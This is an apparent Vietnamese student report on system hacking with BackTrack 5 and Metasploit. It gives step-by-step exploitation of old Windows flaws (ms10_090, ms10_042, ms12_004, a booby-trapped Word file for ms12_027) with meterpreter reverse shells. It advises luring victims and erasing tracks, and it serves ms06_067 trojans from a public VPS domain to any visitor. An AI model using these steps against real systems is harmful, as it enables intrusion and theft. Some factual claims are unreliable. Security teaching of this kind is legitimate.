  • 13. 7 SVTH: Bùi Thanh Dung Hình 1: quá trình tấn công vào 1 hệ thống  Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ thống. Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu ích, chính xác hơn.  Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào khác, mục tiêu phải đạt tới là quyền truy cập vào hệ thống.  Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công.  Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn công.  Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.
  • 14. 8 SVTH: Bùi Thanh Dung  Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao. Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá trình khảo sát, thu thập thông tin của mục tiêucần tấn công bằng những kỹ thuật như Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng cho mục đích truy tìm thông tin. Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn công hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để làm sao vào được trong hệ thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu, chạy chương trình trojan, keylogger…
  • 15. 9 SVTH: Bùi Thanh Dung CHƯƠNG 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN 1. Giới thiệu về hệ điều hành backtract 5 R3 Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10. Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... Hiện tại Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor. Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có thể được phân loại như sau:  Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.  Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning.  Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).  Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web.
  • 16. 10 SVTH: Bùi Thanh Dung  Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này.  Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.  Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất.  Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập.  Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này.  Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.  Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi. 2. Giới thiệu về metasploit Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống
  • 17. 11 SVTH: Bùi Thanh Dung phát hiện tấn công mạng. Metasploit Framework là một môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Metasploit hỗ trợ nhiều giao diện với người dùng:  Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.  Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao diện Web.  Command line interface: dùng msfcli. 2.1. Metasploit Enviroment: Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits. Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác Chúng có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi user interface được thực hiện. 2.2. Chọn module exploit:Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác.  Show exploits: xem các module exploit mà framework có hỗ trợ.  Use exploit_name: chọn module exploit.  Info exploit_name: xem thông tin về module exploit. Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên www.metasploit.com hoặc qua lệnh msfupdate hoặc svnupdat/opt/metasploit/msf3/. 2.3. Cấu hình các module exploit đã chọn  show options: Xác định những options nào cần cấu hình.
  • 18. 12 SVTH: Bùi Thanh Dung  set: cấu hình cho những option của module đó. Một vài module còn có những advanced options, chúng ta có thể xem bằng cách gõ dòng lệnh show advanceds. 2.4. Verify những options vừa cấu hình check: kiểm tra xem những option đã được set chính xác chưa. 2.5. Lựa chọn target  show targets: những target được cung cấp bởi module đó.  set: xác định target nào. 2.6. Lựa chọn payload  show payloads: liệt kê ra những payload của module exploit hiện tại.  info payload_name: xem thông tin chi tiết về payload đó.  set payload payload_name: xác định payload module name. Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó.  show advanced: xem những advanced options của payload đó. 2.7. Thực thi exploit exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho chúng ta những thông tin về hệ thống được khai thác. 3. Sơ đồ tổng quan hệ thống LAN
  • 19. 13 SVTH: Bùi Thanh Dung Hình 2: Sơ đồ tổng quan hệ thống mạng LAN Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin, máy in, máy quét và một số thiết bị khác. Khi một máy tính ở trong mạng LAN, nó có thể sử dụng các chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ IP các host có trong mạng. Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện mạng và kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được cài đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên mạng, các dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ điều hành gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc gói tin hoặc tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap chạy được trên tất cả các hệ điều hành, và các gói nhị phân chính thức có sẵn cho Linux, Windows, và Mac OSX. Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ quét lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác truy
  • 20. 14 SVTH: Bùi Thanh Dung cập vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus, download tại địa chỉ http://www.nessus.org/. Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ thống, Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload files, thay đổi cấu trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài trojan/ backdoor,… 4. Xâm nhập và khai thác lỗ hỏng trên win sp sp2 Các quá trình tấn công xâm nhập trên win sp sp2 trước tiên đã được tìm hiểu bằng các công nghệ thăm dò máy bị tấn công. Và khởi động metasploit trên backtrack 5 R3 bằng cmd: msfconsole Ví dụ ở đây địa chỉ máy backtrack là 192.168.1.15 Hình 3: khởi động metasploit
  • 21. 15 SVTH: Bùi Thanh Dung 4.1. Sử dụng mã lỗi ms10_090 - Bước 1: Sau khi khởi động metapsloit ta tiến hành:  Tìm mã lỗi của hệ điều hành do đã thu thập thông tin từ trước: search ms10_090  Copy dòng mã lỗi đã được tìm thấy và gắn vào sau use  Sau đó show các options cần thiết cho tấn công bằng show options ở đây chúng ta chỉ chú ý tới các option yes. Hình 4.1.1 bước 1 ms10_090 - Bước 2: set các options và exploit mã lỗi  Set SRVRHOST <địa chỉ ip backtrack>  Set PAYLOAD windows/meterpreter/reverse_tcp  Set LHOST < địa chỉ ip backtrack>  Sau khi đã set xong các options ta show lai lần nữa để kiểm cho coi đã đầy đủ chưa.  Rồi exploit mã lỗi ra một link cho mấy victim truy cập.
  • 22. 16 SVTH: Bùi Thanh Dung Hình 4.1.2: bước 2 ms10_090 - Bước 3: chờ đợi nạn nhân truy cập link mà ta đã exploit  Dùng 1 kỹ thuật nào đó để cho máy victim truy cập tới đường link của chúng ta đã tao  Sau đó chờ đợi cho backtrack gửi các mã độc tới máy nạn nhân. Và kết thúc tấn công khi có thông báo successfully. 4.2. Sử dụng mã lỗi ms10_042 - Bước 1: search mã lỗi và show options  Tìm mã lỗi của hệ điều hành do đã thu thập thông tin từ trước: search ms10_042  Copy dòng mã lỗi đã được tìm thấy và gắn vào sau use
  • 23. 17 SVTH: Bùi Thanh Dung  Sau đó show các options cần thiết cho tấn công bằng show options ở đây chúng ta chỉ chú ý tới các option yes. Hình 4.2.1 ms10_042 bước 1 - Bước 2: set options  Set SRVRHOST <địa chỉ ip backtrack>  Set PAYLOAD windows/meterpreter/reverse_tcp  Set LHOST < địa chỉ ip backtrack>  Sau khi đã set xong các options ta show lai lần nữa để kiểm cho coi đã đầy đủ chưa.  Rồi exploit mã lỗi ra một link cho mấy victim truy cập.
  • 24. 18 SVTH: Bùi Thanh Dung Hình 4.2.2 ms10_042 bước 2 - Bước 3: chờ nạn nhân truy cập đường link chúng ta exploit ra
  • 25. 19 SVTH: Bùi Thanh Dung Hình 4.2.3 ms10_042 bước 3 - Bước 4: thực hiện ý đồ tấn công  Session xác định ta đang làm việc với mã lỗi nào  Session –i 1 chọn máy nạn nhân  Help để show các tác vụ có thể thực hiện  Ở đây ta thực hiện tạo 1 thư mục trên desktop của nạn nhân bằng cách shell để đứng trên máy nạn nhân mkdir <tên thư mục>. Hình 4.2.4 ms10_042 bước 4
  • 26. 20 SVTH: Bùi Thanh Dung 4.3. Sử dụn mã lỗi ms12_004 - Bước 1: search mã lỗi và show options  Tìm mã lỗi của hệ điều hành do đã thu thập thông tin từ trước: search ms12_004  Copy dòng mã lỗi đã được tìm thấy và gắn vào sau use  Sau đó show các options cần thiết cho tấn công bằng show options ở đây chúng ta chỉ chú ý tới các option yes. Hình 4.3.1 ms12_004 bước 1 - Bước 2: set options  Set SRVRHOST <địa chỉ ip backtrack>  Set PAYLOAD windows/meterpreter/reverse_tcp  Set LHOST < địa chỉ ip backtrack>
  • 27. 21 SVTH: Bùi Thanh Dung  Sau khi đã set xong các options ta show lai lần nữa để kiểm cho coi đã đầy đủ chưa.  Rồi exploit mã lỗi ra một link cho mấy victim truy cập. Hình 4.3.2 ms12_004 bước 2 - Bước 3: chờ nạn nhận truy cập vào link ta đã exploit được bằng cách nào đó
  • 28. 22 SVTH: Bùi Thanh Dung Hình 4.3.3 ms12_004 bước 3 - Bước 4: thực hiện ý đồ tấn công  Session xác định ta đang làm việc với mã lỗi nào  Session –i 1 chọn máy nạn nhân  Help để show các tác vụ có thể thực hiện  Ở đây ta thực hiện tạo 1 thư mục trên desktop của nạn nhân bằng cách shell để đứng trên máy nạn nhân mkdir <tên thư mục>.
  • 29. 23 SVTH: Bùi Thanh Dung Hình 4.3.4 ms12_004 bước 4 4.4. Sử dụng mã lỗi ms12_027 - Bước 1: search mã lỗi và show options  Tìm mã lỗi của hệ điều hành do đã thu thập thông tin từ trước: search ms12_027  Copy dòng mã lỗi đã được tìm thấy và gắn vào sau use  Sau đó show các options cần thiết cho tấn công bằng show options ở đây chúng ta chỉ chú ý tới các option yes.
  • 30. 24 SVTH: Bùi Thanh Dung Hình 4.4.1 ms12_027 bước 1 - Bước 2: use mã lỗi mới được tìm thấy Sau đó sử set các options và exploit ra file word dùng để gửi qua máy victim từ đó xâm nhập.
  • 31. 25 SVTH: Bùi Thanh Dung Hình 4.4.2 ms12_027 bước 2 - Các options được set là:  Set FILENAME <tên file> : tạo ra file dc tiêm mã độc  Set PAYLOAD windows/meterpreter/reverse_tcp  Set LHOST <địa chỉ máy backtrack>  Set LPORT <địa chỉ máy backtrack>  Exploit để tạo ra file có tên được đặt ở set FILENAME được lưu trữ trong thư mục /root/.msf4/local/<tên của file word> - Vd: file word ở đây tên office.doc - Bước 3: chuyển thư mục đã tạo về Desktop của máy backtrack thuận lợi cho quá trình tấn công.
  • 32. 26 SVTH: Bùi Thanh Dung Hình 4.4.3 ms12_027 bước 3 - Bước 4:  Use exploit/mutil/handler  Và set LPORT lại: set LPORT 4442 Hình 4.4.4 ms12_027 bước 4 - Bước 5:  đưa file word chứa mã độc vào trong thư mục /var/www , cấp quyền cho thư mục đó có quyền chạy và start lại apache2.  Cho phép máy victim có thể tải thư mục đó về máy quá trình xâm nhập và gửi mã độc bắt đầu thực hiện.
  • 33. 27 SVTH: Bùi Thanh Dung Hình 4.4.5 ms12_027 bước 5 - Bước 6:  exploit lỗi và lắng nghe, chờ đợi máy victim download và open file word và gửi máy độc tới máy victim.  Tấn công thành công  Máy có thể gửi mail hay một cách nào lừa victim truy cập vào link 192.168.1.15/office.doc  Sau khi victim truy cập đường link trên và hiện ra một thông báo và tải file .doc về máy.  Chú ý: chỉ khi nào open file .doc đó thì khi đó mới có thể từ backtrack gửi mã độc tới victim được.
  • 34. 28 SVTH: Bùi Thanh Dung Hình 4.4.6 ms12_027 bước 6 Kiểm tra quá trình tấn công trên bactrack Dùng shell để đứng trên desktop của victim Giờ ta tạo một thư mục trên desktop của victim bằng câu lệnh mkdir abc kiểm tra thử trên desktop của victim thử.
  • 35. 29 SVTH: Bùi Thanh Dung Hình 4.4.6 ms12_027 bước 6a Hình 4.4.6 ms12_027 bước 6b Sau kiểm tra ta cũng thấy thư mục abc được tạo thành công. Quá trình tấn công thành công. Giờ thì có thể thực hiện được ý đồ mà ta muốn.
  • 36. 30 SVTH: Bùi Thanh Dung CHƯƠNG 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG TỪ XA QUA MẠNG INTERNET 1. Máy chủ ảo VPS 1.1. Định nghĩa Máychủ ảo (Virtual Private Server -VPS) làphươngphápphân chiamột máy chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trênserver chạyVPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. Mỗi máychủ là một hệ thống hoàntoànriêngbiệt, có hệ điềuhànhriêng, có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạnchế100%khả năng bị hack local. Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêngserver VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường. VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,. 1.2. Đặc điểm về thông số VPS Hoạt độnghoàntoànnhư mộtserverriêngnênsở hữu mộtphần CPU riêng,dung lượng RAM riêng, dung lượng ổHDD riêng, địa chỉ IP và hệ điều hành riêng. Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống. 2. Honeypot
  • 37. 31 SVTH: Bùi Thanh Dung Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục đích giả dạng đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu hút sự chú ý của chúng, ngăn không cho chúng tiếp xúc với hệ thống thật. Hệ thống tài nguyên thông tin có nghĩa là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực tiếp tương tác với tin tặc và tìm cách khai thác thông tin về tin tặc như hình thức tấn công, công cụ tấn công hay cách thức tiến hành thay vì bị tấn công. Với mục tiêu xây dựng Honeypot để xâm nhập vào lỗ hổng hệ thống máy tính qua Internet, Hacker có thể sử dụng Máy chủ ảo (VPS) và cài đặt Honeypot để giả dạng là một Web server bình thường, từ đó đánh lừa máy nạn nhân khi một máy tính bất kỳ có kết nối Internet truy cập vào địa chỉ mà VPS cung cấp. 3. Sơ đồ tổng quan sử dụng Honeypot xâm nhập từ xa thông qua internet Hình 5: sơ đồ tổng quan sử dụng Honepot Chúng ta – đóng vài trò là Attacker, cần chuẩn bị: VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại http://metasploit.org) đóng vai trò là một Honeypot trên mạng.
  • 38. 32 SVTH: Bùi Thanh Dung Hình 6: đã cài đặt thành công metasploit trên VPS 4. Tấn công trên internet Lỗ hổng khai thác: Ms 06_067. Điều kiện: Windows XP without service pack, trình duyệt Internet Explorer 6.0 Môtả:  Là lỗi làm cho IE bị tràn bộ đệm, để có thể dựa vào đó mà tấn công và thực hiện mã lệnh từ xa. Hệ điềuhành bị ảnh hưởng:  Windows XP Universal  Windows 2000 Universal  Windows Server 2003 Universal
  • 39. 33 SVTH: Bùi Thanh Dung Tại cửa sổ Metasploit console, ta sử dụng các lệnh sau để tạo một server lắng nghe các sự truy cập từ bên ngoài.  use exploit/windows/browser/ms06_067_keyframe (Sử dụng lỗi Ms06_067)  show options (Xem thông tin thiết đặt)  set srvhost ptuananh.tk (VPS được đăng ký domain là http://ptuananh.tk )  set lhost ptuananh.tk  set uripath winxp (Đường dẫn kèm theo Domain, nếu để mặc định, metasploit sẽ chọn ngẫu nhiên đường dẫn bất kỳ)  set srvport 80 (Chọn port 80, VPS như một Web Server, tránh sự nghi ngờ của người dùng)  set payload windows/meterpreter/reverse_tcp  exploit Công việc tiếp theo là chờ cho máy mục tiêu truy cập vào địa chỉ: http://ptuananh.tk/winxp . Ngay lúc đó, server trên VPS chúng ta sẽ tiến hành gửi trojan về máy mục tiêu. Hình 7: gửi Trojan về máy victim Bây giờ ta tiến hành khai thác máy nạn nhân với mục đích trước khi tấn công
  • 40. 34 SVTH: Bùi Thanh Dung Hình 8: khai thác thông tin từ máy victim
  • 41. 35 SVTH: Bùi Thanh Dung CHƯƠNG 4: TỔNG KẾT Với những kiểu tấn công hệ thống dựa trên những lỗi sai sót trong quá trình sử dụng máy tính hoặc các lỗi về bảo mật vật lý, có một số phương pháp nhằm giảm thiểu và phòng tránh việc Hacker đánh cắp Mật khẩu như sau: Mật khẩu phải được đặt nhiều hơn 8 ký tự và phải là tổng hợp giữa chữ hoa, chữ thường, số và ký tự đặc biệt để các chương trình khó dò ra. Cấu hình trong registry cho mật khẩu trong hệ thống windows chỉ được băm và lưu dưới dạng NTLM để các chương trình khó khăn để dò tim. Bật lên 1 ở khóa: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaNoLMHash Người dùng admin nên xóa tập tin sam trong thư mục Windows/repair sau mỗi lần backup dữ liệu bằng rdisk. Trong quá trình sử dụng máy tính để truy cập Internet, người dùng cần lưu ý: Không mở tập tin đính kèm thư điện tử có nguồn gốc không rõ ràng hoặc không tin cậy. Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của mình. Đảm bảo Windows của bạn được cập nhật thường xuyên, phần mềm bảo mật của bạn có chức năng cập nhật "live" (tự động cập nhật trực tuyến). Microsoft đã xây dựng một loạt các công cụ trong Windows để các nhà quản trị cũng như người dùng có kinh nghiệm có thể phân tích chiếc máy tính của mình xem liệu nó có đang bị xâm phạm hay không. Một khi nghi ngờ máy tính của mình bị xâm nhập, người dùng có thể sử dụng các công cụ này để tự kiểm tra máy tính của mình khi có những biểu hiện đáng ngờ: WMIC, Lệnh net, Openfiles, Netstat, Find.
  • 42. 36 SVTH: Bùi Thanh Dung TÀI LIỆU THAM KHẢO Sử dụng BackTrack 5 khai thác lỗhổng mạng. Tài liệu system hacking của Athena Tài liệu hacker mũ trắng Athena http://www.hackyshacky.com/2013/03/how-to-hack-facebook-with-backtrack-5.html http://www.slideshare.net/Anhphailamthenao/bo-co-thc-tp-system-hacking?related=5 https://www.youtube.com/watch?v=g1Xo7K2osxE&list=PL6Elfw63yI9RVQLXsK_V7Xy HmiJc_9v56 http://suamaytinhtainha.info/thu-thuat-may-tinh/cach-hack-may-tinh-trong-mang-lan- bang-backtrack-5.html